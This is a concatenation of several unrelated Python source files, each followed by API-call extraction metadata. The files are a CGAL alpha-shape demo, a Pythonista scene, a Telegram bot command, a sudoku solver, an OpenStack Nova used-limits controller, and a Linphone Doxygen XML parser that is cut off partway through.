(['"""kazoo"""'], {}), "('kazoo')\n", (315, 324), False, 'import logging\n'), ((579, 610), 'needlestack.servicers.merger.MergerServicer', 'MergerServicer', (['config', 'manager'], {}), '(config, manager)\n', (593, 610), False, 'from needlestack.servicers.merger import MergerServicer\n')] |
from CGAL.CGAL_Kernel import Point_2
from CGAL.CGAL_Kernel import Weighted_point_2
from CGAL.CGAL_Alpha_shape_2 import Alpha_shape_2
from CGAL.CGAL_Alpha_shape_2 import Weighted_alpha_shape_2
from CGAL.CGAL_Alpha_shape_2 import Weighted_alpha_shape_2_Face_handle
from CGAL.CGAL_Alpha_shape_2 import GENERAL, EXTERIOR, SINGULAR, REGULAR, INTERIOR
from CGAL.CGAL_Alpha_shape_2 import Alpha_shape_2_Vertex_handle
from CGAL.CGAL_Alpha_shape_2 import Alpha_shape_2_Face_handle
from CGAL.CGAL_Alpha_shape_2 import Face_Interval_3
lst = []
lst.append(Point_2(0, 0))
lst.append(Point_2(0, 4))
lst.append(Point_2(44, 0))
lst.append(Point_2(44, 5))
lst.append(Point_2(444, 51))
lst.append(Point_2(14, 1))
t = Alpha_shape_2(lst, 0, GENERAL)
t2 = Alpha_shape_2(lst, 0)
t.clear()
t.make_alpha_shape(lst)
for d in t.alpha():
print(d)
for v in t.finite_vertices():
type = t.classify(v)
print(v.get_range()[0])
if type == INTERIOR:
print("INTERIOR")
elif type == SINGULAR:
print("SINGULAR")
elif type == REGULAR:
print("REGULAR")
elif type == EXTERIOR:
print("EXTERIOR")
for f in t.finite_faces():
i = f.get_ranges(0)
print(i.first)
print(i.second)
print(i.third)
was = Weighted_alpha_shape_2()
lst_wp = []
lst_wp.append(Weighted_point_2(Point_2(0, 0), 1))
lst_wp.append(Weighted_point_2(Point_2(0, 4), 1))
lst_wp.append(Weighted_point_2(Point_2(44, 0), 1))
lst_wp.append(Weighted_point_2(Point_2(44, 5), 1))
lst_wp.append(Weighted_point_2(Point_2(444, 51), 1))
lst_wp.append(Weighted_point_2(Point_2(14, 1), 1))
was.make_alpha_shape(lst_wp)
| [
"CGAL.CGAL_Kernel.Point_2",
"CGAL.CGAL_Alpha_shape_2.Alpha_shape_2",
"CGAL.CGAL_Alpha_shape_2.Weighted_alpha_shape_2"
] | [((702, 732), 'CGAL.CGAL_Alpha_shape_2.Alpha_shape_2', 'Alpha_shape_2', (['lst', '(0)', 'GENERAL'], {}), '(lst, 0, GENERAL)\n', (715, 732), False, 'from CGAL.CGAL_Alpha_shape_2 import Alpha_shape_2\n'), ((738, 759), 'CGAL.CGAL_Alpha_shape_2.Alpha_shape_2', 'Alpha_shape_2', (['lst', '(0)'], {}), '(lst, 0)\n', (751, 759), False, 'from CGAL.CGAL_Alpha_shape_2 import Alpha_shape_2\n'), ((1242, 1266), 'CGAL.CGAL_Alpha_shape_2.Weighted_alpha_shape_2', 'Weighted_alpha_shape_2', ([], {}), '()\n', (1264, 1266), False, 'from CGAL.CGAL_Alpha_shape_2 import Weighted_alpha_shape_2\n'), ((546, 559), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(0)', '(0)'], {}), '(0, 0)\n', (553, 559), False, 'from CGAL.CGAL_Kernel import Point_2\n'), ((572, 585), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(0)', '(4)'], {}), '(0, 4)\n', (579, 585), False, 'from CGAL.CGAL_Kernel import Point_2\n'), ((598, 612), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(44)', '(0)'], {}), '(44, 0)\n', (605, 612), False, 'from CGAL.CGAL_Kernel import Point_2\n'), ((625, 639), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(44)', '(5)'], {}), '(44, 5)\n', (632, 639), False, 'from CGAL.CGAL_Kernel import Point_2\n'), ((652, 668), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(444)', '(51)'], {}), '(444, 51)\n', (659, 668), False, 'from CGAL.CGAL_Kernel import Point_2\n'), ((681, 695), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(14)', '(1)'], {}), '(14, 1)\n', (688, 695), False, 'from CGAL.CGAL_Kernel import Point_2\n'), ((1310, 1323), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(0)', '(0)'], {}), '(0, 0)\n', (1317, 1323), False, 'from CGAL.CGAL_Kernel import Point_2\n'), ((1360, 1373), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(0)', '(4)'], {}), '(0, 4)\n', (1367, 1373), False, 'from CGAL.CGAL_Kernel import Point_2\n'), ((1410, 1424), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(44)', '(0)'], {}), '(44, 0)\n', (1417, 1424), False, 'from CGAL.CGAL_Kernel import Point_2\n'), ((1461, 1475), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(44)', '(5)'], {}), '(44, 5)\n', (1468, 1475), False, 'from CGAL.CGAL_Kernel import Point_2\n'), ((1512, 1528), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(444)', '(51)'], {}), '(444, 51)\n', (1519, 1528), False, 'from CGAL.CGAL_Kernel import Point_2\n'), ((1565, 1579), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(14)', '(1)'], {}), '(14, 1)\n', (1572, 1579), False, 'from CGAL.CGAL_Kernel import Point_2\n')] |
import scene
class MyScene(scene.Scene):
def setup(self):
self.label_node = scene.LabelNode('A',
position=(100,400), parent=self)
self.start_flag = False
def update(self):
if self.start_flag:
x,y = self.label_node.position
if x < 340:
self.label_node.position = (x+2, y)
else:
self.start_flag = False
def touch_ended(self, touch):
self.start_flag = True
scene.run(MyScene())
| [
"scene.LabelNode"
] | [((91, 145), 'scene.LabelNode', 'scene.LabelNode', (['"""A"""'], {'position': '(100, 400)', 'parent': 'self'}), "('A', position=(100, 400), parent=self)\n", (106, 145), False, 'import scene\n')] |
from bot.commands import BaseCommand
import mongo
class DisconnectCommand(BaseCommand):
_COMMAND = 'disconnect'
_DESCRIPTION = 'Close currently active chat.'
_SUCCESS_MESSAGE = 'Disconnected from chat'
def _callback(self, user, _bot, update, **kwargs):
return self._call(user, _bot, update, **kwargs)
def _call(self, user, _bot, update, **kwargs):
chat = mongo.chats.get_active_chat_by_telegram_id(user.id)
if chat:
mongo.chats.disable_chat(chat['_id'])
return True
_bot.send_message(
user.id,
'You are not connected to any vk user',
)
return False
| [
"mongo.chats.get_active_chat_by_telegram_id",
"mongo.chats.disable_chat"
] | [((397, 448), 'mongo.chats.get_active_chat_by_telegram_id', 'mongo.chats.get_active_chat_by_telegram_id', (['user.id'], {}), '(user.id)\n', (439, 448), False, 'import mongo\n'), ((478, 515), 'mongo.chats.disable_chat', 'mongo.chats.disable_chat', (["chat['_id']"], {}), "(chat['_id'])\n", (502, 515), False, 'import mongo\n')] |
import numpy as np
board = np.zeros(shape=(9, 9))
count = 0
def solve():
global count
count += 1
if count % 1000 == 0:
print('\rCurrent number of computations made:', count, end='')
freePos = find()
if freePos is None:
return True
i = freePos[0]
j = freePos[1]
for w in range(1, 10):
if possible(w, freePos):
board[i][j] = w
if solve():
return True
board[i][j] = 0
return False
def find():
for i in range(9):
for j in range(9):
if board[i][j] == 0:
return [i, j]
return None
def possible(value, position):
    # position = [row, col] list as returned by find()
i = position[0]
j = position[1]
# checks row and column for repeat value
if (value in board[:, j]) or (value in board[i]):
return False
# reset to i,j - top left square
i = (i // 3) * 3
j = (j // 3) * 3
# check all squares in square
for n in range(i, i + 3):
for m in range(j, j + 3):
if board[n][m] == value:
return False
return True
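# Worked example of the box arithmetic above (added for illustration): for
# position [4, 7], (4 // 3) * 3 == 3 and (7 // 3) * 3 == 6, so the enclosing
# 3x3 box spans rows 3-5 and columns 6-8.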
def change(position):
    # position = [row, col] list as returned by find()
i = position[0]
j = position[1]
for w in range(1, 10):
if w not in board[:, j] and w not in board[i]:
board[i][j] = w
return True
return False
def initialize():
print("Please enter the values on the board starting from left to right, top to bottom, 0 for blank")
integerChunk = input("Numbers: ")
pos = 0
for i in range(9):
for j in range(9):
board[i][j] = int(integerChunk[pos])
pos += 1
def displayBoard():
for i in range(3):
for j in range(9):
if board[i][j] == 0:
print(" ", end="")
else:
print("%d " % board[i][j], end="")
if (j == 2) or (j == 5):
print("| ", end="")
if j == 8:
print("")
print("- - - - - - - - - - -")
for i in range(3, 6):
for j in range(9):
if board[i][j] == 0:
print(" ", end="")
else:
print("%d " % board[i][j], end="")
if (j == 2) or (j == 5):
print("| ", end="")
if j == 8:
print("")
print("- - - - - - - - - - -")
for i in range(6, 9):
for j in range(9):
if board[i][j] == 0:
print(" ", end="")
else:
print("%d " % board[i][j], end="")
if (j == 2) or (j == 5):
print("| ", end="")
if j == 8:
print("")
def main():
initialize()
print("Is this the correct board? Press enter to continue or 'q' to exit program.")
displayBoard()
response = input()
if response == "q":
exit()
print("---------------SOLVING---------------\n")
solve()
print("\r\rSOLUTION")
displayBoard()
print("\nTotal number of computations:", count)
if __name__ == "__main__":
main()
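# Example input (added for illustration): initialize() expects all 81 cells as a
# single string of digits, row by row, using 0 for blanks, e.g. the classic puzzle
# "530070000600195000098000060800060003400803001700020006060000280000419005000080079".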
| [
"numpy.zeros"
] | [((28, 50), 'numpy.zeros', 'np.zeros', ([], {'shape': '(9, 9)'}), '(shape=(9, 9))\n', (36, 50), True, 'import numpy as np\n')] |
# Copyright 2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova.api.openstack import api_version_request
from nova.api.openstack.api_version_request \
import MIN_WITHOUT_PROXY_API_SUPPORT_VERSION
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova.policies import used_limits as ul_policies
from nova import quota
QUOTAS = quota.QUOTAS
class UsedLimitsController(wsgi.Controller):
@staticmethod
def _reserved(req):
try:
return int(req.GET['reserved'])
except (ValueError, KeyError):
return False
@wsgi.extends
@extensions.expected_errors(())
def index(self, req, resp_obj):
context = req.environ['nova.context']
project_id = self._project_id(context, req)
quotas = QUOTAS.get_project_quotas(context, project_id, usages=True)
if api_version_request.is_supported(
req, min_version=MIN_WITHOUT_PROXY_API_SUPPORT_VERSION):
quota_map = {
'totalRAMUsed': 'ram',
'totalCoresUsed': 'cores',
'totalInstancesUsed': 'instances',
'totalServerGroupsUsed': 'server_groups',
}
else:
quota_map = {
'totalRAMUsed': 'ram',
'totalCoresUsed': 'cores',
'totalInstancesUsed': 'instances',
'totalFloatingIpsUsed': 'floating_ips',
'totalSecurityGroupsUsed': 'security_groups',
'totalServerGroupsUsed': 'server_groups',
}
used_limits = {}
for display_name, key in quota_map.items():
if key in quotas:
reserved = (quotas[key]['reserved']
if self._reserved(req) else 0)
used_limits[display_name] = quotas[key]['in_use'] + reserved
resp_obj.obj['limits']['absolute'].update(used_limits)
def _project_id(self, context, req):
if 'tenant_id' in req.GET:
tenant_id = req.GET.get('tenant_id')
target = {
'project_id': tenant_id,
'user_id': context.user_id
}
context.can(ul_policies.BASE_POLICY_NAME, target)
return tenant_id
return context.project_id
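# Illustrative response fragment (values assumed): after this extension runs, the
# absolute limits document gains entries such as
#   {"limits": {"absolute": {"totalRAMUsed": 2048, "totalCoresUsed": 4,
#                            "totalInstancesUsed": 2, "totalServerGroupsUsed": 1}}}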
| [
"nova.api.openstack.extensions.expected_errors",
"nova.api.openstack.api_version_request.is_supported"
] | [((1173, 1203), 'nova.api.openstack.extensions.expected_errors', 'extensions.expected_errors', (['()'], {}), '(())\n', (1199, 1203), False, 'from nova.api.openstack import extensions\n'), ((1426, 1519), 'nova.api.openstack.api_version_request.is_supported', 'api_version_request.is_supported', (['req'], {'min_version': 'MIN_WITHOUT_PROXY_API_SUPPORT_VERSION'}), '(req, min_version=\n MIN_WITHOUT_PROXY_API_SUPPORT_VERSION)\n', (1458, 1519), False, 'from nova.api.openstack import api_version_request\n')] |
#!/usr/bin/python
# Copyright (C) 2014 Belledonne Communications SARL
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
import argparse
import os
import six
import string
import sys
import xml.etree.ElementTree as ET
import xml.dom.minidom as minidom
import metadoc
class CObject:
def __init__(self, name):
self.name = name.strip()
self.briefDescription = ''
self.detailedDescription = None
self.deprecated = False
self.briefDoc = None
class CEnumValue(CObject):
def __init__(self, name):
CObject.__init__(self, name)
self.value = None
class CEnum(CObject):
def __init__(self, name):
CObject.__init__(self, name)
self.values = []
self.associatedTypedef = None
def addValue(self, value):
self.values.append(value)
class CStructMember(CObject):
def __init__(self, name, t):
CObject.__init__(self, name)
self.ctype = t.strip()
class CStruct(CObject):
def __init__(self, name):
CObject.__init__(self, name)
self.members = []
self.associatedTypedef = None
def addMember(self, member):
self.members.append(member)
class CTypedef(CObject):
def __init__(self, name, definition):
CObject.__init__(self, name)
self.definition = definition.strip()
class CArgument(CObject):
def __init__(self, t, name = '', enums = [], structs = []):
CObject.__init__(self, name)
self.description = None
self.containedType = None
keywords = [ 'const', 'struct', 'enum', 'signed', 'unsigned', 'short', 'long', '*' ]
fullySplittedType = []
splittedType = t.strip().split(' ')
for s in splittedType:
if s.startswith('*'):
fullySplittedType.append('*')
if len(s) > 1:
fullySplittedType.append(s[1:])
elif s.endswith('*'):
fullySplittedType.append(s[:-1])
fullySplittedType.append('*')
else:
fullySplittedType.append(s)
if 'MS2_DEPRECATED' in fullySplittedType:
fullySplittedType.remove('MS2_DEPRECATED')
elif 'LINPHONE_DEPRECATED' in fullySplittedType:
fullySplittedType.remove('LINPHONE_DEPRECATED')
isStruct = False
isEnum = False
self.ctype = 'int' # Default to int so that the result is correct eg. for 'unsigned short'
for s in fullySplittedType:
if not s in keywords:
self.ctype = s
if s == 'struct':
isStruct = True
if s == 'enum':
isEnum = True
if isStruct:
for st in structs:
if st.associatedTypedef is not None:
self.ctype = st.associatedTypedef.name
elif isEnum:
for e in enums:
if e.associatedTypedef is not None:
self.ctype = e.associatedTypedef.name
if self.ctype == 'int' and 'int' not in fullySplittedType:
if fullySplittedType[-1] == '*':
fullySplittedType.insert(-1, 'int')
else:
fullySplittedType.append('int')
self.completeType = ' '.join(fullySplittedType)
def __str__(self):
return self.completeType + " " + self.name
class CArgumentsList:
def __init__(self):
self.arguments = []
def addArgument(self, arg):
self.arguments.append(arg)
def __len__(self):
return len(self.arguments)
def __getitem__(self, key):
return self.arguments[key]
def __str__(self):
argstr = []
for arg in self.arguments:
argstr.append(str(arg))
return ', '.join(argstr)
class CFunction(CObject):
def __init__(self, name, returnarg, argslist):
CObject.__init__(self, name)
self.returnArgument = returnarg
self.arguments = argslist
self.location = None
class CEvent(CFunction):
pass
class CProperty:
def __init__(self, name):
self.name = name
self.getter = None
self.setter = None
class CClass(CObject):
def __init__(self, st):
CObject.__init__(self, st.associatedTypedef.name)
if st.deprecated or st.associatedTypedef.deprecated:
self.deprecated = True
if len(st.associatedTypedef.briefDescription) > 0:
self.briefDescription = st.associatedTypedef.briefDescription
elif len(st.briefDescription) > 0:
self.briefDescription = st.briefDescription
if st.associatedTypedef.detailedDescription is not None:
self.detailedDescription = st.associatedTypedef.detailedDescription
elif st.detailedDescription is not None:
self.detailedDescription = st.detailedDescription
self.__struct = st
self.events = {}
self.classMethods = {}
self.instanceMethods = {}
self.properties = {}
self.__computeCFunctionPrefix()
def __computeCFunctionPrefix(self):
self.cFunctionPrefix = ''
first = True
for l in self.name:
if l.isupper() and not first:
self.cFunctionPrefix += '_'
self.cFunctionPrefix += l.lower()
first = False
self.cFunctionPrefix += '_'
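		# Example (added for illustration): a class named "LinphoneCallLog" yields
		# the C function prefix "linphone_call_log_".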
def __addPropertyGetter(self, name, f):
if not name in self.properties:
prop = CProperty(name)
self.properties[name] = prop
self.properties[name].getter = f
def __addPropertySetter(self, name, f):
if not name in self.properties:
prop = CProperty(name)
self.properties[name] = prop
self.properties[name].setter = f
def __addClassMethod(self, f):
if not f.name in self.classMethods:
self.classMethods[f.name] = f
def __addInstanceMethod(self, f):
name = f.name[len(self.cFunctionPrefix):]
if name.startswith('get_') and len(f.arguments) == 1:
self.__addPropertyGetter(name[4:], f)
elif name.startswith('is_') and len(f.arguments) == 1 and f.returnArgument.ctype == 'bool_t':
self.__addPropertyGetter(name, f)
elif name.endswith('_enabled') and len(f.arguments) == 1 and f.returnArgument.ctype == 'bool_t':
self.__addPropertyGetter(name, f)
elif name.startswith('set_') and len(f.arguments) == 2:
self.__addPropertySetter(name[4:], f)
elif name.startswith('enable_') and len(f.arguments) == 2 and f.arguments[1].ctype == 'bool_t':
self.__addPropertySetter(name[7:] + '_enabled', f)
else:
if not f.name in self.instanceMethods:
self.instanceMethods[f.name] = f
def addEvent(self, ev):
if not ev.name in self.events:
self.events[ev.name] = ev
def addMethod(self, f):
if len(f.arguments) > 0 and f.arguments[0].ctype == self.name:
self.__addInstanceMethod(f)
else:
self.__addClassMethod(f)
class Project:
def __init__(self):
self.verbose = False
self.prettyPrint = False
self.enums = []
self.__structs = []
self.__typedefs = []
self.__events = []
self.__functions = []
self.classes = []
self.docparser = metadoc.Parser()
def add(self, elem):
if isinstance(elem, CClass):
if self.verbose:
print("Adding class " + elem.name)
self.classes.append(elem)
elif isinstance(elem, CEnum):
if self.verbose:
print("Adding enum " + elem.name)
for ev in elem.values:
print("\t" + ev.name)
self.enums.append(elem)
elif isinstance(elem, CStruct):
if self.verbose:
print("Adding struct " + elem.name)
for sm in elem.members:
print("\t" + sm.ctype + " " + sm.name)
self.__structs.append(elem)
elif isinstance(elem, CTypedef):
if self.verbose:
print("Adding typedef " + elem.name)
print("\t" + elem.definition)
self.__typedefs.append(elem)
elif isinstance(elem, CEvent):
if self.verbose:
print("Adding event " + elem.name)
print("\tReturns: " + elem.returnArgument.ctype)
print("\tArguments: " + str(elem.arguments))
self.__events.append(elem)
elif isinstance(elem, CFunction):
if self.verbose:
print("Adding function " + elem.name)
print("\tReturns: " + elem.returnArgument.ctype)
print("\tArguments: " + str(elem.arguments))
self.__functions.append(elem)
def __cleanDescription(self, descriptionNode):
for para in descriptionNode.findall('./para'):
for n in para.findall('./parameterlist'):
para.remove(n)
for n in para.findall("./simplesect[@kind='return']"):
para.remove(n)
for n in para.findall("./simplesect[@kind='see']"):
t = ''.join(n.itertext())
n.clear()
n.tag = 'see'
n.text = t
for n in para.findall("./simplesect[@kind='note']"):
n.tag = 'note'
n.attrib = {}
for n in para.findall(".//xrefsect"):
para.remove(n)
for n in para.findall('.//ref'):
n.attrib = {}
for n in para.findall(".//bctbx_list"):
para.remove(n)
if descriptionNode.tag == 'parameterdescription':
descriptionNode.tag = 'description'
if descriptionNode.tag == 'simplesect':
descriptionNode.tag = 'description'
descriptionNode.attrib = {}
return descriptionNode
def __canBeWrapped(self, node):
return node.find('./detaileddescription//donotwrap') is None
def __discoverClasses(self):
for td in self.__typedefs:
if td.definition.startswith('enum '):
for e in self.enums:
if (e.associatedTypedef is None) and td.definition[5:] == e.name:
e.associatedTypedef = td
break
elif td.definition.startswith('struct '):
structFound = False
for st in self.__structs:
if (st.associatedTypedef is None) and td.definition[7:] == st.name:
st.associatedTypedef = td
structFound = True
break
if not structFound:
name = td.definition[7:]
print("Structure with no associated typedef: " + name)
st = CStruct(name)
st.associatedTypedef = td
self.add(st)
for td in self.__typedefs:
if td.definition.startswith('struct '):
for st in self.__structs:
if st.associatedTypedef == td:
cclass = CClass(st)
cclass.briefDoc = td.briefDoc
self.add(cclass)
break
elif ('Linphone' + td.definition) == td.name:
st = CStruct(td.name)
st.associatedTypedef = td
cclass = CClass(st)
cclass.briefDoc = td.briefDoc
self.add(st)
self.add(cclass)
# Sort classes by length of name (longest first), so that methods are put in the right class
self.classes.sort(key = lambda c: len(c.name), reverse = True)
for e in self.__events:
eventAdded = False
for c in self.classes:
if c.name.endswith('Cbs') and e.name.startswith(c.name):
c.addEvent(e)
eventAdded = True
break
if not eventAdded:
for c in self.classes:
if e.name.startswith(c.name):
c.addEvent(e)
eventAdded = True
break
for f in self.__functions:
for c in self.classes:
if c.cFunctionPrefix == f.name[0 : len(c.cFunctionPrefix)]:
c.addMethod(f)
break
def __parseCEnumValueInitializer(self, initializer):
initializer = initializer.strip()
if not initializer.startswith('='):
return None
initializer = initializer[1:]
initializer.strip()
return initializer
def __parseCEnumValue(self, node):
ev = CEnumValue(node.find('./name').text)
initializerNode = node.find('./initializer')
if initializerNode is not None:
ev.value = self.__parseCEnumValueInitializer(initializerNode.text)
deprecatedNode = node.find(".//xrefsect[xreftitle='Deprecated']")
if deprecatedNode is not None:
ev.deprecated = True
ev.briefDescription = ''.join(node.find('./briefdescription').itertext()).strip()
ev.briefDoc = self.docparser.parse_description(node.find('./briefdescription'))
ev.detailedDescription = self.__cleanDescription(node.find('./detaileddescription'))
return ev
def __parseCEnumMemberdef(self, node):
if not Project.__canBeWrapped(self, node):
return None
e = CEnum(node.find('./name').text)
deprecatedNode = node.find(".//xrefsect[xreftitle='Deprecated']")
if deprecatedNode is not None:
e.deprecated = True
e.briefDescription = ''.join(node.find('./briefdescription').itertext()).strip()
e.briefDoc = self.docparser.parse_description(node.find('./briefdescription'))
e.detailedDescription = self.__cleanDescription(node.find('./detaileddescription'))
enumvalues = node.findall("enumvalue[@prot='public']")
for enumvalue in enumvalues:
ev = self.__parseCEnumValue(enumvalue)
e.addValue(ev)
return e
def __findCEnum(self, tree):
memberdefs = tree.findall("./compounddef[@kind='group']/sectiondef[@kind='enum']/memberdef[@kind='enum'][@prot='public']")
for m in memberdefs:
e = self.__parseCEnumMemberdef(m)
self.add(e)
def __parseCStructMember(self, node, structname):
name = node.find('./name').text
definition = node.find('./definition').text
t = definition[0:definition.find(structname + "::" + name)]
sm = CStructMember(name, t)
deprecatedNode = node.find(".//xrefsect[xreftitle='Deprecated']")
if deprecatedNode is not None:
sm.deprecated = True
sm.briefDescription = ''.join(node.find('./briefdescription').itertext()).strip()
sm.briefDoc = self.docparser.parse_description(node.find('./briefdescription'))
sm.detailedDescription = self.__cleanDescription(node.find('./detaileddescription'))
return sm
def __parseCStructCompounddef(self, node):
s = CStruct(node.find('./compoundname').text)
deprecatedNode = node.find(".//xrefsect[xreftitle='Deprecated']")
if deprecatedNode is not None:
s.deprecated = True
s.briefDescription = ''.join(node.find('./briefdescription').itertext()).strip()
s.briefDoc = self.docparser.parse_description(node.find('./briefdescription'))
s.detailedDescription = self.__cleanDescription(node.find('./detaileddescription'))
structmembers = node.findall("sectiondef/memberdef[@kind='variable'][@prot='public']")
for structmember in structmembers:
sm = self.__parseCStructMember(structmember, s.name)
s.addMember(sm)
return s
def __findCStruct(self, tree):
compounddefs = tree.findall("./compounddef[@kind='struct'][@prot='public']")
for c in compounddefs:
s = self.__parseCStructCompounddef(c)
self.add(s)
def __parseCTypedefMemberdef(self, node):
if not Project.__canBeWrapped(self, node):
return None
name = node.find('./name').text
definition = node.find('./definition').text
if definition.startswith('typedef '):
definition = definition[8 :]
if name.endswith('Cb'):
pos = definition.find("(*")
if pos == -1:
return None
returntype = definition[0:pos].strip()
returnarg = CArgument(returntype, enums = self.enums, structs = self.__structs)
			# make sure the warning accumulator exists before the return-value check below
			missingDocWarning = ''
			returndesc = node.find("./detaileddescription/para/simplesect[@kind='return']")
if returndesc is not None:
if returnarg.ctype == 'MSList' or returnarg.ctype == 'bctbx_list_t':
n = returndesc.find('.//bctbxlist')
if n is not None:
returnarg.containedType = n.text
returnarg.description = self.__cleanDescription(returndesc)
elif returnarg.completeType != 'void':
missingDocWarning += "\tReturn value is not documented\n"
definition = definition[pos + 2 :]
pos = definition.find("(")
definition = definition[pos + 1 : -1]
argslist = CArgumentsList()
for argdef in definition.split(', '):
argType = ''
starPos = argdef.rfind('*')
spacePos = argdef.rfind(' ')
if starPos != -1:
argType = argdef[0 : starPos + 1]
argName = argdef[starPos + 1 :]
elif spacePos != -1:
argType = argdef[0 : spacePos]
argName = argdef[spacePos + 1 :]
argslist.addArgument(CArgument(argType, argName, self.enums, self.__structs))
if len(argslist) > 0:
paramdescs = node.findall("detaileddescription/para/parameterlist[@kind='param']/parameteritem")
if paramdescs:
for arg in argslist.arguments:
for paramdesc in paramdescs:
if arg.name == paramdesc.find('./parameternamelist').find('./parametername').text:
arg.description = self.__cleanDescription(paramdesc.find('./parameterdescription'))
missingDocWarning = ''
for arg in argslist.arguments:
if arg.description == None:
missingDocWarning += "\t'" + arg.name + "' parameter not documented\n";
if missingDocWarning != '':
print(name + ":\n" + missingDocWarning)
f = CEvent(name, returnarg, argslist)
deprecatedNode = node.find(".//xrefsect[xreftitle='Deprecated']")
if deprecatedNode is not None:
f.deprecated = True
f.briefDescription = ''.join(node.find('./briefdescription').itertext()).strip()
f.briefDoc = self.docparser.parse_description(node.find('./briefdescription'))
f.detailedDescription = self.__cleanDescription(node.find('./detaileddescription'))
return f
else:
pos = definition.rfind(" " + name)
if pos != -1:
definition = definition[0 : pos]
td = CTypedef(name, definition)
deprecatedNode = node.find(".//xrefsect[xreftitle='Deprecated']")
if deprecatedNode is not None:
td.deprecated = True
td.briefDescription = ''.join(node.find('./briefdescription').itertext()).strip()
td.briefDoc = self.docparser.parse_description(node.find('./briefdescription'))
td.detailedDescription = self.__cleanDescription(node.find('./detaileddescription'))
return td
return None
def __findCTypedef(self, tree):
memberdefs = tree.findall("./compounddef[@kind='group']/sectiondef[@kind='typedef']/memberdef[@kind='typedef'][@prot='public']")
for m in memberdefs:
td = self.__parseCTypedefMemberdef(m)
self.add(td)
def __parseCFunctionMemberdef(self, node):
if not Project.__canBeWrapped(self, node):
return None
internal = node.find("./detaileddescription/internal")
if internal is not None:
return None
missingDocWarning = ''
name = node.find('./name').text
t = ''.join(node.find('./type').itertext())
returnarg = CArgument(t, enums = self.enums, structs = self.__structs)
returndesc = node.find("./detaileddescription/para/simplesect[@kind='return']")
if returndesc is not None:
if returnarg.ctype == 'MSList' or returnarg.ctype == 'bctbx_list_t':
n = returndesc.find('.//bctbxlist')
if n is not None:
returnarg.containedType = n.text
returnarg.description = self.__cleanDescription(returndesc)
elif returnarg.completeType != 'void':
missingDocWarning += "\tReturn value is not documented\n"
argslist = CArgumentsList()
argslistNode = node.findall('./param')
for argNode in argslistNode:
argType = ''.join(argNode.find('./type').itertext())
argName = ''
argNameNode = argNode.find('./declname')
if argNameNode is not None:
argName = ''.join(argNameNode.itertext())
if argType != 'void':
argslist.addArgument(CArgument(argType, argName, self.enums, self.__structs))
if len(argslist) > 0:
paramdescs = node.findall("./detaileddescription/para/parameterlist[@kind='param']/parameteritem")
if paramdescs:
for arg in argslist.arguments:
for paramdesc in paramdescs:
if arg.name == paramdesc.find('./parameternamelist').find('./parametername').text:
if arg.ctype == 'MSList' or arg.ctype == 'bctbx_list_t':
n = paramdesc.find('.//bctbxlist')
if n is not None:
arg.containedType = n.text
arg.description = self.__cleanDescription(paramdesc.find('./parameterdescription'))
missingDocWarning = ''
for arg in argslist.arguments:
if arg.description == None:
missingDocWarning += "\t'" + arg.name + "' parameter not documented\n";
f = CFunction(name, returnarg, argslist)
deprecatedNode = node.find(".//xrefsect[xreftitle='Deprecated']")
if deprecatedNode is not None:
f.deprecated = True
f.briefDescription = ''.join(node.find('./briefdescription').itertext()).strip()
f.briefDoc = self.docparser.parse_description(node.find('./briefdescription'))
f.detailedDescription = self.__cleanDescription(node.find('./detaileddescription'))
if f.briefDescription == '' and ''.join(f.detailedDescription.itertext()).strip() == '':
return None
locationNode = node.find('./location')
if locationNode is not None:
f.location = locationNode.get('file')
if not f.location.endswith('.h'):
missingDocWarning += "\tNot documented in a header file ('" + f.location + "')\n";
if missingDocWarning != '':
print(name + ":\n" + missingDocWarning)
return f
def __findCFunction(self, tree):
memberdefs = tree.findall("./compounddef[@kind='group']/sectiondef[@kind='func']/memberdef[@kind='function'][@prot='public'][@static='no']")
for m in memberdefs:
f = self.__parseCFunctionMemberdef(m)
if f is not None:
self.add(f)
def initFromFiles(self, xmlfiles):
trees = []
for f in xmlfiles:
tree = None
try:
if self.verbose:
print("Parsing XML file: " + f.name)
tree = ET.parse(f)
except ET.ParseError as e:
print(e)
if tree is not None:
trees.append(tree)
for tree in trees:
self.__findCEnum(tree)
for tree in trees:
self.__findCStruct(tree)
for tree in trees:
self.__findCTypedef(tree)
for tree in trees:
self.__findCFunction(tree)
self.__discoverClasses()
def initFromDir(self, xmldir):
files = [ os.path.join(xmldir, f) for f in os.listdir(xmldir) if (os.path.isfile(os.path.join(xmldir, f)) and f.endswith('.xml')) ]
self.initFromFiles(files)
def check(self):
for c in self.classes:
for name, p in six.iteritems(c.properties):
if p.getter is None and p.setter is not None:
print("Property '" + name + "' of class '" + c.name + "' has a setter but no getter")
class Generator:
def __init__(self, outputfile):
self.__outputfile = outputfile
def __generateEnum(self, cenum, enumsNode):
enumNodeAttributes = { 'name' : cenum.name, 'deprecated' : str(cenum.deprecated).lower() }
if cenum.associatedTypedef is not None:
enumNodeAttributes['name'] = cenum.associatedTypedef.name
enumNode = ET.SubElement(enumsNode, 'enum', enumNodeAttributes)
if cenum.briefDescription != '':
